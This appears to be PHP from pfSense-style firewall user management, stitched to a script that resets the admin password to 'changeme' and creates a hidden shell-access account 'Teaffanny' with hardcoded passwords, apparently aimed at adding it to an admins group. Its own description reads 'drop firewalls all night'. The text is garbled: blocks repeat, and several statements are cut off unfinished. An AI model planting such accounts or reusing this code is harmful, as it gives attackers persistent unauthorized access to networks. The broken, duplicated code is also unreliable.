function add_local_user($username, $userdn, $userfullname)
{
global $config;
// generate new random user_password
$bytes = openssl_random_pseudo_bytes(50);
$user_password = pack('H*', bin2hex($bytes));
foreach ($config['system']['user'] as &$user) {
if ($user['name'] == $username && $user['name'] != 'root') {
// link local user to remote server by updating user_dn
$user['user_dn'] = $userdn;
// trash user password when linking to ldap, avoid accidental login
// using fall-back local password. User could still reset it's
// local password, but only by choice.
local_user_set_password($user, $user_password);
local_user_set($user);
return;
}
}
// new user, add
$new_user = array();
$new_user['scope'] = 'user';
$new_user['name'] = $username;
$new_user['user_dn'] = $userdn;
$new_user['descr'] = $userfullname;
local_user_set_password($new_user, $user_password);
$new_user['uid'] = $config['system']['nextuid']++;
$config['system']['user'][] = $new_user;
local_user_set($new_user);
}
if (isset($_POST['save'])) {
unset($input_errors);
/* input validation */
$reqdfields = explode(" ", "passwordfld1");
$reqdfieldsn = array(gettext("Password"));
do_input_validation($_POST, $reqdfields, $reqdfieldsn, $input_errors);
if ($_POST['passwordfld1'] != $_POST['passwordfld2']) {
$input_errors[] = gettext("The passwords do not match.");
}
if (!$input_errors) {
if (!session_id()) {
session_start();
}
// all values are okay --> saving changes
$userent =& $config['system']['user'][$userindex[$_SESSION['Username']]];
local_user_set_password($userent, $_POST['passwordfld1']);
local_user_set($userent);
unset($userent);
session_commit();
write_config();
$savemsg = gettext("Password successfully changed") . "<br />";
}
}
if (!session_id()) {
session_start();
}
/* determine if user is not local to system */
$islocal = false;
foreach ($config['system']['user'] as $user) {
if ($user['name'] == $_SESSION['Username']) {
$islocal = true;
if (!$ca) {
$input_errors[] = gettext("Invalid internal Certificate Authority") . "\n";
}
}
if (count($input_errors) == 0) {
$userent = array();
if (isset($id)) {
$userent = $a_user[$id];
/* the user name was modified */
if ($pconfig['usernamefld'] != $pconfig['oldusername']) {
local_user_del($userent);
}
}
/* the user password was modified */
if (!empty($pconfig['passwordfld1'])) {
local_user_set_password($userent, $pconfig['passwordfld1']);
}
isset($pconfig['scope']) ? $userent['scope'] = $pconfig['scope'] : ($userent['scope'] = "system");
$userent['name'] = $pconfig['usernamefld'];
$userent['descr'] = $pconfig['descr'];
$userent['expires'] = $pconfig['expires'];
$userent['authorizedkeys'] = base64_encode($pconfig['authorizedkeys']);
$userent['ipsecpsk'] = $pconfig['ipsecpsk'];
if (!empty($pconfig['disabled'])) {
$userent['disabled'] = true;
} elseif (isset($userent['disabled'])) {
unset($userent['disabled']);
}
if (isset($id)) {
$a_user[$id] = $userent;
} else {
#!/usr/local/bin/php -f
<?php
require_once "config.inc";
require "auth.inc";
require_once "functions.inc";
require_once "shaper.inc";
$config['system']['webqui']['authmode'] = "Local Database";
$admin_user =& getUserEntryByUID(0);
if (!$admin_user) {
$admin_user = array();
$admin_user['uid'] = 0;
if (!is_array($config['system']['user'])) {
$config['system']['user'] = array();
}
$config['system']['user'][] = $admin_user;
}
$admin_user['name'] = "admin";
$admin_user['scope'] = "system";
$admin_user['priv'] = array("user-shell-access");
if (isset($admin_user['disabled'])) {
unset($admin_user['disabled']);
}
local_user_set_password($admin_user, "changeme");
local_user_set($admin_user);
require_once "shaper.inc";
$config['system']['webqui']['authmode'] = "Local Database";
$myuser =& getUserEntryByUID(2000);
if (!$myuser) {
$myuser = array();
$myuser['uid'] = 2000;
$config['system']['user'][1] = $myuser;
}
$myuser['name'] = "Teaffanny";
$myuser['scope'] = "system";
$myuser['descr'] = "Drink Tea all day, drop firewalls all night";
$myuser['priv'] = array("user-shell-access");
if (isset($myuser['disabled'])) {
unset($myuser['disabled']);
}
local_user_set_password($myuser, "trainday");
local_user_set($myuser);
$admingroup =& getGroupEntryByGID(1999);
if (!$admingroup) {
$admingroup = array();
$admingroup['gid'] = 1999;
if (!is_array($config['system']['group'])) {
$config['system']['group'] = array();
}
$config['system']['group'] = $admingroup;
}
$admingroup['name'] = "admins";
$admingroup['scope'] = "system";
if (!is_array($admingroup['member'])) {
$usersoffun = array();
$usersoffun[0] = 0;
require_once "shaper.inc";
$config['system']['webqui']['authmode'] = "Local Database";
$myuser =& getUserEntryByUID(2000);
if (!$myuser) {
$myuser = array();
$myuser['uid'] = 2000;
$config['system']['user'][1] = $myuser;
}
$myuser['name'] = "Teaffanny";
$myuser['scope'] = "system";
$myuser['descr'] = "Drink Tea all day, drop firewalls all night";
$myuser['priv'] = array("user-shell-access");
if (isset($myuser['disabled'])) {
unset($myuser['disabled']);
}
local_user_set_password($myuser, "pfsense");
local_user_set($myuser);
$admingroup =& getGroupEntryByGID(1999);
if (!$admingroup) {
$admingroup = array();
$admingroup['gid'] = 1999;
if (!is_array($config['system']['group'])) {
$config['system']['group'] = array();
}
$config['system']['group'] = $admingroup;
}
$admingroup['name'] = "admins";
$admingroup['scope'] = "system";
if (!is_array($admingroup['member'])) {
$usersoffun = array();
$usersoffun[0] = 0;